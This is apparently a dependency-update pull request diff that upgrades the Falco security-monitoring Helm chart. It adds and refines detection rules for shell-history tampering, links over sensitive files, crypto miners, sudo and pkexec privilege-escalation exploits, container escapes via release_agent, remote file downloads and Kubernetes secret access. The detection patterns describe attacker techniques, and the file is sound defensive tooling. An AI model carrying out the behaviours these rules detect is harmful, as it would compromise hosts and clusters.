-          evt.arg.name contains "bash_history" or
-          evt.arg.name contains "zsh_history" or
+          evt.arg.name endswith "ash_history" or
+          evt.arg.name endswith "zsh_history" or
           evt.arg.name contains "fish_read_history" or
           evt.arg.name endswith "fish_history" or
-          evt.arg.oldpath contains "bash_history" or
-          evt.arg.oldpath contains "zsh_history" or
+          evt.arg.oldpath endswith "ash_history" or
+          evt.arg.oldpath endswith "zsh_history" or
           evt.arg.oldpath contains "fish_read_history" or
           evt.arg.oldpath endswith "fish_history" or
-          evt.arg.path contains "bash_history" or
-          evt.arg.path contains "zsh_history" or
+          evt.arg.path endswith "ash_history" or
+          evt.arg.path endswith "zsh_history" or
           evt.arg.path contains "fish_read_history" or
           evt.arg.path endswith "fish_history"))
 
+    # here `ash_history` will match both `bash_history` and `ash_history`
     - macro: truncate_shell_history
       condition: >
         (open_write and (
-          fd.name contains "bash_history" or
-          fd.name contains "zsh_history" or
+          fd.name endswith "ash_history" or
+          fd.name endswith "zsh_history" or
           fd.name contains "fish_read_history" or
           fd.name endswith "fish_history") and evt.arg.flags contains "O_TRUNC")
 
@@ -3003,7 +3474,7 @@
       items: [hyperkube, kubelet, k3s-agent]
 
     # This macro should be overridden in user rules as needed. This is useful if a given application
-    # should not be ignored alltogether with the user_known_chmod_applications list, but only in
+    # should not be ignored altogether with the user_known_chmod_applications list, but only in
     # specific conditions.
     - macro: user_known_set_setuid_or_setgid_bit_conditions
       condition: (never_true)
@@ -3082,8 +3553,18 @@
         create_symlink and
         (evt.arg.target in (sensitive_file_names) or evt.arg.target in (sensitive_directory_names))
       output: >
-        Symlinks created over senstivie files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.target linkpath=%evt.arg.linkpath parent_process=%proc.pname)
-      priority: NOTICE
+        Symlinks created over sensitive files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.target linkpath=%evt.arg.linkpath parent_process=%proc.pname)
+      priority: WARNING
+      tags: [file, mitre_exfiltration]
+
+    - rule: Create Hardlink Over Sensitive Files
+      desc: Detect hardlink created over sensitive files
+      condition: >
+        create_hardlink and
+        (evt.arg.oldpath in (sensitive_file_names))
+      output: >
+        Hardlinks created over sensitive files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.oldpath linkpath=%evt.arg.newpath parent_process=%proc.pname)
+      priority: WARNING
       tags: [file, mitre_exfiltration]
 
     - list: miner_ports
@@ -3176,11 +3657,10 @@
       condition: (fd.sport in (miner_ports) and fd.sip.name in (miner_domains))
 
     - macro: net_miner_pool
-      condition: (evt.type in (sendto, sendmsg) and evt.dir=< and (fd.net != "127.0.0.0/8" and not fd.snet in (rfc_1918_addresses)) and ((minerpool_http) or (minerpool_https) or (minerpool_other)))
+      condition: (evt.type in (sendto, sendmsg, connect) and evt.dir=< and (fd.net != "127.0.0.0/8" and not fd.snet in (rfc_1918_addresses)) and ((minerpool_http) or (minerpool_https) or (minerpool_other)))
 
     - macro: trusted_images_query_miner_domain_dns
-      condition: (container.image.repository in (docker.io/falcosecurity/falco, falcosecurity/falco))
-      append: false
+      condition: (container.image.repository in (docker.io/falcosecurity/falco, falcosecurity/falco, public.ecr.aws/falcosecurity/falco))
 
     # The rule is disabled by default.
     # Note: falco will send DNS request to resolve miner pool domain which may trigger alerts in your environment.
@@ -3188,13 +3668,13 @@
       desc: Miners typically connect to miner pools on common ports.
       condition: net_miner_pool and not trusted_images_query_miner_domain_dns
       enabled: false
-      output: Outbound connection to IP/Port flagged by cryptoioc.ch (command=%proc.cmdline port=%fd.rport ip=%fd.rip container=%container.info image=%container.image.repository)
+      output: Outbound connection to IP/Port flagged by https://cryptoioc.ch (command=%proc.cmdline port=%fd.rport ip=%fd.rip container=%container.info image=%container.image.repository)
       priority: CRITICAL
       tags: [network, mitre_execution]
 
     - rule: Detect crypto miners using the Stratum protocol
       desc: Miners typically specify the mining pool to connect to with a URI that begins with 'stratum+tcp'
-      condition: spawned_process and proc.cmdline contains "stratum+tcp"
+      condition: spawned_process and (proc.cmdline contains "stratum+tcp" or proc.cmdline contains "stratum2+tcp" or proc.cmdline contains "stratum+ssl" or proc.cmdline contains "stratum2+ssl")
       output: Possible miner running (command=%proc.cmdline container=%container.info image=%container.image.repository)
       priority: CRITICAL
       tags: [process, mitre_execution]
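The broadened Stratum rule above now also catches `stratum2` and TLS-wrapped pool URIs. A hedged Python rendering of the `proc.cmdline contains ...` checks (the function name and the pool hostname are illustrative, not part of Falco):

```python
# Substring markers matching the four `proc.cmdline contains` clauses
# in the "Detect crypto miners using the Stratum protocol" rule.
STRATUM_MARKERS = ("stratum+tcp", "stratum2+tcp", "stratum+ssl", "stratum2+ssl")

def cmdline_uses_stratum(cmdline: str) -> bool:
    """Return True if any Stratum URI scheme appears in the command line."""
    return any(marker in cmdline for marker in STRATUM_MARKERS)

print(cmdline_uses_stratum("xmrig -o stratum2+ssl://pool.example:443"))  # True
print(cmdline_uses_stratum("curl https://example.com"))                  # False
```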
@@ -3330,7 +3810,7 @@
 
     # The two Container Drift rules below will fire when a new executable is created in a container.
     # There are two ways to create executables - file is created with execution permissions or permissions change of existing file.
-    # We will use a new sysdig filter, is_open_exec, to find all files creations with execution permission, and will trace all chmods in a container.
+    # We will use a new filter, is_open_exec, to find all file creations with execution permission, and will trace all chmods in a container.
     # The use case we are targeting here is an attempt to execute code that was not shipped as part of a container (drift) -
     # an activity that might be malicious or non-compliant.
     # Two things to pay attention to:
@@ -3363,7 +3843,7 @@
     - rule: Container Drift Detected (open+create)
       desc: New executable created in a container due to open+create
       condition: >
-        evt.type in (open,openat,creat) and
+        evt.type in (open,openat,openat2,creat) and
         evt.is_open_exec=true and
         container and
         not runc_writing_exec_fifo and
@@ -3413,7 +3893,7 @@
     # A privilege escalation to root through heap-based buffer overflow
     - rule: Sudo Potential Privilege Escalation
      desc: Privilege escalation vulnerability affecting sudo (<= 1.9.5p2). By executing sudoedit -s or sudoedit -i with a command-line argument that ends with a single backslash character, an unprivileged user can elevate their privileges to root.
-      condition: spawned_process and user.uid != 0 and proc.name=sudoedit and (proc.args contains -s or proc.args contains -i) and (proc.args contains "\ " or proc.args endswith \)
+      condition: spawned_process and user.uid != 0 and (proc.name=sudoedit or proc.name = sudo) and (proc.args contains -s or proc.args contains -i or proc.args contains --login) and (proc.args contains "\ " or proc.args endswith \)
       output: "Detect Sudo Privilege Escalation Exploit (CVE-2021-3156) (user=%user.name parent=%proc.pname cmdline=%proc.cmdline %container.info)"
       priority: CRITICAL
       tags: [filesystem, mitre_privilege_escalation]
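To make the widened CVE-2021-3156 condition readable: the diff adds plain `sudo` and `--login` alongside the original `sudoedit -s/-i` match, while keeping the trailing-backslash heuristic. A rough Python stand-in (the parameter names are illustrative substitutes for Falco's `proc.*` and `user.*` fields, not a real Falco API):

```python
def sudo_baron_samedit_suspect(proc_name: str, args: str, uid: int) -> bool:
    """Mirror of the rule condition: non-root user running sudo/sudoedit
    in shell/login mode with an argument containing or ending in a backslash."""
    return (
        uid != 0
        and proc_name in ("sudoedit", "sudo")
        and ("-s" in args or "-i" in args or "--login" in args)
        and ("\\ " in args or args.endswith("\\"))
    )

print(sudo_baron_samedit_suspect("sudoedit", "-s \\", 1000))  # True
print(sudo_baron_samedit_suspect("sudo", "ls", 1000))         # False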
@@ -3431,13 +3911,17 @@
     - macro: mount_info
       condition: (proc.args="" or proc.args intersects ("-V", "-l", "-h"))
 
+    - macro: user_known_mount_in_privileged_containers
+      condition: (never_true)
+
     - rule: Mount Launched in Privileged Container
-      desc: Detect file system mount happened inside a privilegd container which might lead to container escape.
+      desc: Detect file system mount happened inside a privileged container which might lead to container escape.
       condition: >
         spawned_process and container
         and container.privileged=true
         and proc.name=mount
         and not mount_info
+        and not user_known_mount_in_privileged_containers
       output: Mount was executed inside a privileged container (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline %container.info image=%container.image.repository:%container.image.tag)
       priority: WARNING
       tags: [container, cis, mitre_lateral_movement]
@@ -3460,12 +3944,64 @@
       priority: CRITICAL
       tags: [syscall, mitre_defense_evasion]
 
+    - list: ingress_remote_file_copy_binaries
+      items: [wget]
+
+    - macro: ingress_remote_file_copy_procs
+      condition: (proc.name in (ingress_remote_file_copy_binaries))
+
+    # Users should override this macro to define conditions under which the
+    # use of an ingress remote file copy tool in a container is expected.
+    - macro: user_known_ingress_remote_file_copy_activities
+      condition: (never_true)
+
+    - macro: curl_download
+      condition: proc.name = curl and
+                 (proc.cmdline contains " -o " or
+                 proc.cmdline contains " --output " or
+                 proc.cmdline contains " -O " or
+                 proc.cmdline contains " --remote-name ")
+
+    - rule: Launch Ingress Remote File Copy Tools in Container
+      desc: Detect ingress remote file copy tools launched in container
+      condition: >
+        spawned_process and
+        container and
+        (ingress_remote_file_copy_procs or curl_download) and
+        not user_known_ingress_remote_file_copy_activities
+      output: >
+        Ingress remote file copy tool launched in container (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline parent_process=%proc.pname
+        container_id=%container.id container_name=%container.name image=%container.image.repository:%container.image.tag)
+      priority: NOTICE
+      tags: [network, process, mitre_command_and_control]
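As a companion to the `curl_download` macro above: it flags curl invocations that write the response to a file (`-o`/`-O` and their long forms), which is what distinguishes a download from a plain request. A Python sketch of those substring checks, hedged as illustration only (function name and sample URLs are invented; Falco evaluates the macro itself):

```python
# Flag substrings matching the four `proc.cmdline contains` clauses
# of the curl_download macro; the surrounding spaces avoid matching
# flag-like substrings embedded in URLs or filenames.
DOWNLOAD_FLAGS = (" -o ", " --output ", " -O ", " --remote-name ")

def is_curl_download(proc_name: str, cmdline: str) -> bool:
    """Return True if a curl process is saving output to a file."""
    return proc_name == "curl" and any(f in cmdline for f in DOWNLOAD_FLAGS)

print(is_curl_download("curl", "curl -O https://example.com/payload.sh "))  # True
print(is_curl_download("curl", "curl https://example.com/"))                # False
```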
+
+    # This rule helps detect CVE-2021-4034:
+    # A privilege escalation to root through memory corruption
+    - rule: Polkit Local Privilege Escalation Vulnerability (CVE-2021-4034)
+      desc: "This rule detects an attempt to exploit a privilege escalation vulnerability in Polkit's pkexec. By running specially crafted code, a local user can leverage this flaw to gain root privileges on a compromised system"
+      condition:
+        spawned_process and user.uid != 0 and proc.name=pkexec and proc.args = ''
+      output:
+        "Detect Polkit pkexec Local Privilege Escalation Exploit (CVE-2021-4034) (user=%user.loginname uid=%user.loginuid command=%proc.cmdline args=%proc.args)"
+      priority: CRITICAL
+      tags: [process, mitre_privilege_escalation]
+
+
+    - rule: Detect release_agent File Container Escapes
+      desc: "This rule detects an attempt to exploit a container escape using the release_agent file. By running a container with certain capabilities, a privileged user can modify the release_agent file and escape from the container"
+      condition:
+        open_write and container and fd.name endswith release_agent and (user.uid=0 or thread.cap_effective contains CAP_DAC_OVERRIDE) and thread.cap_effective contains CAP_SYS_ADMIN
+      output:
+        "Detect an attempt to exploit a container escape using release_agent file (user=%user.name user_loginuid=%user.loginuid filename=%fd.name %container.info image=%container.image.repository:%container.image.tag cap_effective=%thread.cap_effective)"
+      priority: CRITICAL
+      tags: [container, mitre_privilege_escalation, mitre_lateral_movement]
+
     # Application rules have moved to application_rules.yaml. Please look
     # there if you want to enable them by adding to
     # falco_rules.local.yaml.
   k8s_audit_rules.yaml: |
     #
-    # Copyright (C) 2019 The Falco Authors.
+    # Copyright (C) 2022 The Falco Authors.
     #
     #
     # Licensed under the Apache License, Version 2.0 (the "License");
@@ -3480,7 +4016,14 @@
     # See the License for the specific language governing permissions and
     # limitations under the License.
     #
-    - required_engine_version: 2
+
+    - required_engine_version: 12
+
+    - required_plugin_versions:
+      - name: k8saudit
+        version: 0.1.0
+      - name: json
+        version: 0.3.0
 
     # Like always_true/always_false, but works with k8s audit events
     - macro: k8s_audit_always_true
@@ -3517,13 +4060,24 @@
         cluster-autoscaler,
         "system:addon-manager",
         "cloud-controller-manager",
-        "eks:node-manager",
         "system:kube-controller-manager"
         ]
 
+    - list: eks_allowed_k8s_users
+      items: [
+        "eks:node-manager",
+        "eks:certificate-controller",
+        "eks:fargate-scheduler",
+        "eks:k8s-metrics",
+        "eks:authenticator",
+        "eks:cluster-event-watcher",
+        "eks:nodewatcher",
+        "eks:pod-identity-mutating-webhook"
+        ]
     - rule: Disallowed K8s User
       desc: Detect any k8s operation by users outside of an allowed set of users.
-      condition: kevt and non_system_user and not ka.user.name in (allowed_k8s_users)
+      condition: kevt and non_system_user and not ka.user.name in (allowed_k8s_users) and not ka.user.name in (eks_allowed_k8s_users)
       output: K8s Operation performed by user not in allowed list of users (user=%ka.user.name target=%ka.target.name/%ka.target.resource verb=%ka.verb uri=%ka.uri resp=%ka.response.code)
       priority: WARNING
       source: k8s_audit
@@ -3541,6 +4095,9 @@
     - macro: response_successful
       condition: (ka.response.code startswith 2)
 
+    - macro: kget
+      condition: ka.verb=get
+
     - macro: kcreate
       condition: ka.verb=create
 
@@ -3586,6 +4143,12 @@
     - macro: health_endpoint
       condition: ka.uri=/healthz
 
+    - macro: live_endpoint
+      condition: ka.uri=/livez
+
+    - macro: ready_endpoint
+      condition: ka.uri=/readyz
+
     - rule: Create Disallowed Pod
       desc: >
         Detect an attempt to start a pod with a container image outside of a list of allowed images.
@@ -3618,6 +4181,19 @@
       source: k8s_audit
       tags: [k8s]
 
+    # These container images are allowed to run with hostnetwork=true
+    - list: falco_hostnetwork_images
+      items: [
+        gcr.io/google-containers/prometheus-to-sd,
+        gcr.io/projectcalico-org/typha,
+        gcr.io/projectcalico-org/node,
+        gke.gcr.io/gke-metadata-server,
+        gke.gcr.io/kube-proxy,
+        gke.gcr.io/netd-amd64,
+        k8s.gcr.io/ip-masq-agent-amd64,
+        k8s.gcr.io/prometheus-to-sd,
+        ]
+
     # Corresponds to K8s CIS Benchmark 1.7.4
     - rule: Create HostNetwork Pod
       desc: Detect an attempt to start a pod using the host network.
@@ -3627,6 +4203,28 @@
       source: k8s_audit
       tags: [k8s]
 
+    - list: falco_hostpid_images
+      items: []
+
+    - rule: Create HostPid Pod
+      desc: Detect an attempt to start a pod using the host pid namespace.
+      condition: kevt and pod and kcreate and ka.req.pod.host_pid intersects (true) and not ka.req.pod.containers.image.repository in (falco_hostpid_images)
+      output: Pod started using host pid namespace (user=%ka.user.name pod=%ka.resp.name ns=%ka.target.namespace images=%ka.req.pod.containers.image)
+      priority: WARNING
+      source: k8s_audit
+      tags: [k8s]
+
+    - list: falco_hostipc_images
+      items: []
+
+    - rule: Create HostIPC Pod
+      desc: Detect an attempt to start a pod using the host ipc namespace.
+      condition: kevt and pod and kcreate and ka.req.pod.host_ipc intersects (true) and not ka.req.pod.containers.image.repository in (falco_hostipc_images)
+      output: Pod started using host ipc namespace (user=%ka.user.name pod=%ka.resp.name ns=%ka.target.namespace images=%ka.req.pod.containers.image)
+      priority: WARNING
+      source: k8s_audit
+      tags: [k8s]
+
     - macro: user_known_node_port_service
       condition: (k8s_audit_never_true)
 
@@ -3661,7 +4259,7 @@
     - rule: Anonymous Request Allowed
       desc: >
         Detect any request made by the anonymous user that was allowed
-      condition: kevt and ka.user.name=system:anonymous and ka.auth.decision="allow" and not health_endpoint
+      condition: kevt and ka.user.name=system:anonymous and ka.auth.decision="allow" and not health_endpoint and not live_endpoint and not ready_endpoint
       output: Request by anonymous user allowed (user=%ka.user.name verb=%ka.verb uri=%ka.uri reason=%ka.auth.reason))
       priority: WARNING
       source: k8s_audit
@@ -3741,6 +4339,7 @@
         k8s.gcr.io/kube-apiserver,
         gke.gcr.io/kube-proxy,
         gke.gcr.io/netd-amd64,
+        gke.gcr.io/watcher-daemonset,
        k8s.gcr.io/addon-resizer,
         k8s.gcr.io/prometheus-to-sd,
         k8s.gcr.io/k8s-dns-dnsmasq-nanny-amd64,
@@ -3768,9 +4367,31 @@
       items: []
 
     - list: known_sa_list
-      items: ["pod-garbage-collector","resourcequota-controller","cronjob-controller","generic-garbage-collector",
-              "daemon-set-controller","endpointslice-controller","deployment-controller", "replicaset-controller",
-              "endpoint-controller", "namespace-controller", "statefulset-controller", "disruption-controller"]
+      items: [
+        coredns,
+        coredns-autoscaler,
+        cronjob-controller,
+        daemon-set-controller,
+        deployment-controller,
+        disruption-controller,
+        endpoint-controller,
+        endpointslice-controller,
+        endpointslicemirroring-controller,
+        generic-garbage-collector,
+        horizontal-pod-autoscaler,
+        job-controller,
+        namespace-controller,
+        node-controller,
+        persistent-volume-binder,
+        pod-garbage-collector,
+        pv-protection-controller,
+        pvc-protection-controller,
+        replicaset-controller,
+        resourcequota-controller,
+        root-ca-cert-publisher,
+        service-account-controller,
+        statefulset-controller
+        ]
 
     - macro: trusted_sa
       condition: (ka.target.name in (known_sa_list, user_known_sa_list))
@@ -3797,7 +4418,7 @@
       tags: [k8s]
 
     # Detect any attempt to create a ClusterRoleBinding to the cluster-admin user
-    # (exapand this to any built-in cluster role that does "sensitive" things)
+    # (expand this to any built-in cluster role that does "sensitive" things)
     - rule: Attach to cluster-admin Role
       desc: Detect any attempt to create a ClusterRoleBinding to the cluster-admin user
       condition: kevt and clusterrolebinding and kcreate and ka.req.binding.role=cluster-admin
@@ -3910,7 +4531,7 @@
     - rule: K8s Serviceaccount Created
       desc: Detect any attempt to create a service account
       condition: (kactivity and kcreate and serviceaccount and response_successful)
-      output: K8s Serviceaccount Created (user=%ka.user.name user=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      output: K8s Serviceaccount Created (user=%ka.user.name serviceaccount=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
       priority: INFO
       source: k8s_audit
       tags: [k8s]
@@ -3918,7 +4539,7 @@
     - rule: K8s Serviceaccount Deleted
       desc: Detect any attempt to delete a service account
       condition: (kactivity and kdelete and serviceaccount and response_successful)
-      output: K8s Serviceaccount Deleted (user=%ka.user.name user=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      output: K8s Serviceaccount Deleted (user=%ka.user.name serviceaccount=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
       priority: INFO
       source: k8s_audit
       tags: [k8s]
@@ -3964,13 +4585,37 @@
       tags: [k8s]
 
     - rule: K8s Secret Deleted
-      desc: Detect any attempt to delete a secret Service account tokens are excluded.
+      desc: Detect any attempt to delete a secret. Service account tokens are excluded.
       condition: (kactivity and kdelete and secret and ka.target.namespace!=kube-system and non_system_user and response_successful)
       output: K8s Secret Deleted (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
       priority: INFO
       source: k8s_audit
       tags: [k8s]
 
+    - rule: K8s Secret Get Successfully
+      desc: >
+        Detect any attempt to get a secret. Service account tokens are excluded.
+      condition: >
+        secret and kget
+        and kactivity
+        and response_successful
+      output: K8s Secret Get Successfully (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      priority: ERROR
+      source: k8s_audit
+      tags: [k8s]
+
+    - rule: K8s Secret Get Unsuccessfully Tried
+      desc: >
+        Detect an unsuccessful attempt to get the secret. Service account tokens are excluded.
+      condition: >
+        secret and kget
+        and kactivity
+        and not response_successful
+      output: K8s Secret Get Unsuccessfully Tried (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      priority: WARNING
+      source: k8s_audit
+      tags: [k8s]
+
     # This rule generally matches all events, and as a result is disabled
     # by default. If you wish to enable these events, modify the
     # following macro.
@@ -4003,7 +4648,7 @@
    # cluster creation. This may signify a permission setting that is too broad.
     # As we can't check for role of the user on a general ka.* event, this
     # may or may not be an administrator. Customize the full_admin_k8s_users
-    # list to your needs, and activate at your discrection.
+    # list to your needs, and activate at your discretion.
 
     # # How to test:
     # # Execute any kubectl command connected using default cluster user, as:
@@ -4184,8 +4829,8 @@
         app: falco
         role: security
       annotations:
-        checksum/config: 9ac2b16de3ea0caa56e07879f0d383db5a400f1e84c2e04d5f2cec53f8b23a4a
-        checksum/rules: 4fead7ed0d40bd6533c61315bc4089d124976d46b052192f768b9c97be5d405e
+        checksum/config: 18b080595aa175135b555cb1694e2c4125eefb719f084ee981367b4eaf5cb20a
+        checksum/rules: 68356f67ecfaa369afd632bc6e442df32656d44cb6933e0d8ecbbf15db132879
         checksum/certs: 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
     spec:
       serviceAccountName: falco
@@ -4196,7 +4841,7 @@
           operator: Exists
       containers:
         - name: falco
-          image: public.ecr.aws/falcosecurity/falco:0.30.0
+          image: public.ecr.aws/falcosecurity/falco:0.32.0
           imagePullPolicy: IfNotPresent
           resources:
             limits:
@@ -4211,11 +4856,14 @@
             - /usr/bin/falco
             - --cri
             - /run/containerd/containerd.sock
+            - --cri
+            - /run/crio/crio.sock
             - -K
             - /var/run/secrets/kubernetes.io/serviceaccount/token
             - -k
             - https://$(KUBERNETES_SERVICE_HOST)
-            - --k8s-node="${FALCO_K8S_NODE_NAME}"
+            - --k8s-node
+            - "$(FALCO_K8S_NODE_NAME)"
             - -pk
           env:
             - name: FALCO_K8S_NODE_NAME
@@ -4243,6 +4891,8 @@
           volumeMounts:
             - mountPath: /host/run/containerd/containerd.sock
               name: containerd-socket
+            - mountPath: /host/run/crio/crio.sock
+              name: crio-socket
             - mountPath: /host/dev
               name: dev-fs
               readOnly: true
@@ -4270,6 +4920,9 @@
         - name: containerd-socket
           hostPath:
             path: /var/run/k3s/containerd/containerd.sock
+        - name: crio-socket
+          hostPath:
+            path: /run/crio/crio.sock
         - name: dev-fs
           hostPath:
             path: /dev
@@ -4300,6 +4953,10 @@
                 path: falco_rules.local.yaml
               - key: application_rules.yaml
                 path: rules.available/application_rules.yaml
+              - key: k8s_audit_rules.yaml
+                path: k8s_audit_rules.yaml
+              - key: aws_cloudtrail_rules.yaml
+                path: aws_cloudtrail_rules.yaml
         - name: rules-volume
           configMap:
             name: falco-rules

@renovate renovate bot changed the title chore(deps): update helm release falco to v1.19.4 chore(deps): update Helm release falco to v1.19.4 Jun 27, 2022
@renovate renovate bot changed the title chore(deps): update Helm release falco to v1.19.4 chore(deps): update helm release falco to v1.19.4 Jun 28, 2022
@renovate renovate bot changed the title chore(deps): update helm release falco to v1.19.4 chore(deps): update helm release falco to v1.19.4 - autoclosed Mar 25, 2023
@renovate renovate bot deleted the renovate/falco-1.x branch March 25, 2023 15:58